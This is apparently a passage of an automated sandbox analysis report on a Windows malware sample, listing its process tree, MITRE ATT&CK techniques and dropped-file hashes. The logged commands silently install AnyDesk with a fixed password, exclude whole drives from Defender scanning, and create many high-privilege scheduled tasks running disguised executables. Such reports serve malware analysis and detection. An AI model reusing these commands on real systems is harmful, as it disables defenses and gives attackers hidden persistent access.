- Delays execution with timeout.exe
PID:2988

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic" start WMService
6⤵
PID:564

C:\Windows\SysWOW64\net.exe
net start WMService
6⤵
PID:1836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start WMService
7⤵
PID:2532

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:3032

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 60 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2564

C:\programdata\any.exe
"C:\programdata\any.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\any.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:112

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:1800

C:\Windows\SysWOW64\net.exe
net stop TaskSc
4⤵
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
5⤵
PID:1488

C:\Windows\SysWOW64\net.exe
net stop TaskScs
4⤵
- Suspicious use of WriteProcessMemory
PID:900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskScs
5⤵
PID:1492

C:\Windows\SysWOW64\net.exe
net stop AnyDesk
4⤵
PID:2040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AnyDesk
5⤵
PID:872

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM anydesk.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wininit1.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
5⤵
- Loads dropped DLL
PID:840

C:\ProgramData\wsappz.exe
C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1828

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2440

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --set-password
4⤵
PID:2568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c echo Pass32552
4⤵
PID:2584

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
4⤵
PID:2424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
5⤵
PID:2900

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --get-id
6⤵
PID:2628

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2872

C:\programdata\dc.exe
"C:\programdata\dc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1156

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe"
3⤵
PID:1884

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\runtimeMonitor\PsYm20I.bat" "
4⤵
- Loads dropped DLL
PID:1628

C:\runtimeMonitor\ComdriverSvc.exe
"C:\runtimeMonitor\ComdriverSvc.exe"
5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
6⤵
PID:2248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
6⤵
PID:844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
6⤵
PID:1112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
6⤵
PID:1960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
6⤵
PID:2024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
6⤵
PID:2256

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZWQuciDSE5.bat"
6⤵
PID:2804

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
7⤵
PID:552

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dwm.exe
"C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dwm.exe"
7⤵
PID:2524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
6⤵
PID:2488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
6⤵
PID:2232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
6⤵
PID:2412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/runtimeMonitor/'
6⤵
PID:272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
6⤵
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
6⤵
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
6⤵
PID:824

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --service
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:564

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Program Files\Reference Assemblies\Microsoft\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Windows\twain_32\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\twain_32\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Windows\twain_32\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:560

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --control
1⤵
PID:712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Favorites\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Default\Favorites\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Favorites\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Downloads\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Downloads\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Admin\Downloads\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ComdriverSvcC" /sc MINUTE /mo 13 /tr "'C:\Recovery\ed738222-6219-11ed-b5ae-5e34c4ab0fa3\ComdriverSvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ComdriverSvc" /sc ONLOGON /tr "'C:\Recovery\ed738222-6219-11ed-b5ae-5e34c4ab0fa3\ComdriverSvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ComdriverSvcC" /sc MINUTE /mo 8 /tr "'C:\Recovery\ed738222-6219-11ed-b5ae-5e34c4ab0fa3\ComdriverSvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\runtimeMonitor\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\runtimeMonitor\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\runtimeMonitor\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "timeoutt" /sc MINUTE /mo 10 /tr "'C:\Windows\SysWOW64\pt-PT\timeout.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "timeout" /sc ONLOGON /tr "'C:\Windows\SysWOW64\pt-PT\timeout.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "timeoutt" /sc MINUTE /mo 9 /tr "'C:\Windows\SysWOW64\pt-PT\timeout.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "AnyDeskA" /sc MINUTE /mo 7 /tr "'C:\Windows\debug\WIA\AnyDesk.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "AnyDesk" /sc ONLOGON /tr "'C:\Windows\debug\WIA\AnyDesk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "AnyDeskA" /sc MINUTE /mo 13 /tr "'C:\Windows\debug\WIA\AnyDesk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\AnyDesk\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\All Users\AnyDesk\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\AnyDesk\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\runtimeMonitor\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\runtimeMonitor\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\runtimeMonitor\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Recovery\ed738222-6219-11ed-b5ae-5e34c4ab0fa3\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\ed738222-6219-11ed-b5ae-5e34c4ab0fa3\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Recovery\ed738222-6219-11ed-b5ae-5e34c4ab0fa3\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo Pass32552
1⤵
PID:2588

C:\windows\tasks\Wmiic.exe
C:\windows\tasks\Wmiic.exe
1⤵
PID:2400

C:\windows\tasks\IntelConfigService.exe
"IntelConfigService.exe"
2⤵
PID:2124

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Winlogon Helper DLL

T1004

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dwm.exe
Filesize
1.0MB

MD5
18557c37efdef82648622fa471a2db2f

SHA1
e72f774a0bd16c3d7074a826f7f1711845738972

SHA256
04142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27

SHA512
fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dwm.exe
Filesize
1.0MB

MD5
18557c37efdef82648622fa471a2db2f

SHA1
e72f774a0bd16c3d7074a826f7f1711845738972

SHA256
04142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27

SHA512
fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b

Download Submit
C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\service.conf
Filesize
2KB

MD5
ba0d5e1b76aa0e5b12d82921f9bdac32

SHA1
159859534ea74b298acfff05353186740328fbba

SHA256
4f296e0ca5802f71fd5c81ace2ad122ff79944ffbb121605f2ff755f04a0e3f1

SHA512
b832fd23046738a0e3a28afddb55ab4612daa32d40b66be58026524df0f57b4fb8a18714b68aabead2a338787ac320953316fc5f428702c13fbe785c3bfabbf9

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
370B

MD5
afdc4f69f4720b8c4153f6186f49a2b6

SHA1
329c27ea36d7913809b0c239bb58e91d2ee468ac

SHA256
9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571

SHA512
3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
b514c64bd726ce647d966aa2c1e8f00b

SHA1
8e7a0dd20a2856d3e2a8fc687c503e83a3e81674

SHA256
767702d1003fb47c7fcac6ffc22e3c42428afcd927f8bb53c0e84b7656dbda3c

SHA512
9b642dcba3ec078fe5b272c294587012a6e985022586139375bb39ebd60419baef1187cd71dcbc9cd47b34ee08b90ece91435d49aa7db95f19581b9041fad1ef

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
b514c64bd726ce647d966aa2c1e8f00b

SHA1
8e7a0dd20a2856d3e2a8fc687c503e83a3e81674

SHA256
767702d1003fb47c7fcac6ffc22e3c42428afcd927f8bb53c0e84b7656dbda3c

SHA512
9b642dcba3ec078fe5b272c294587012a6e985022586139375bb39ebd60419baef1187cd71dcbc9cd47b34ee08b90ece91435d49aa7db95f19581b9041fad1ef

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
b514c64bd726ce647d966aa2c1e8f00b

SHA1
8e7a0dd20a2856d3e2a8fc687c503e83a3e81674

SHA256
767702d1003fb47c7fcac6ffc22e3c42428afcd927f8bb53c0e84b7656dbda3c

SHA512
9b642dcba3ec078fe5b272c294587012a6e985022586139375bb39ebd60419baef1187cd71dcbc9cd47b34ee08b90ece91435d49aa7db95f19581b9041fad1ef

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
9aeb281426bb2cfa662d23add7f011a3

SHA1
d2db0d4a97f730c49d74d0862c8ad5a23c97c367

SHA256
fdc294505d656190d219d7eb867ef17b45bf3ffa605f20d1e5d0e8449c7afd7f

SHA512
636d8b13cf6dc62424c7a1b1ffb5c337cc4be0baa29e641ba6af88cabc42a483d5276687e387ac71d1ebb2ab24eaf7f181eae01bb0ae9ba48fa88ec84601400b

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
9aeb281426bb2cfa662d23add7f011a3

SHA1
d2db0d4a97f730c49d74d0862c8ad5a23c97c367

SHA256
fdc294505d656190d219d7eb867ef17b45bf3ffa605f20d1e5d0e8449c7afd7f

SHA512
636d8b13cf6dc62424c7a1b1ffb5c337cc4be0baa29e641ba6af88cabc42a483d5276687e387ac71d1ebb2ab24eaf7f181eae01bb0ae9ba48fa88ec84601400b

Download Submit
C:\ProgramData\any.exe
Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
C:\ProgramData\curl.exe
Filesize
5.2MB

MD5
a0f6d97ed18c23ab31af5e5d9d220692

SHA1
89569e7947cf086f14b0e89dca92cb36d2bf7e66

SHA256
33d278869a1ec81d05c25c1b1bd309d5466622451581ee84ed741fdf37213459

SHA512
08c5c4327ca00632a8d2a79fc68c729f5872992ef58739ca9c094ef305d104dbc92c65958ced11513838003ca837b7b0a4781e7d00410508f0d8aecfbef83a34

Download Submit
C:\ProgramData\dc.exe
Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
C:\ProgramData\wsappz.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\wsappz.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
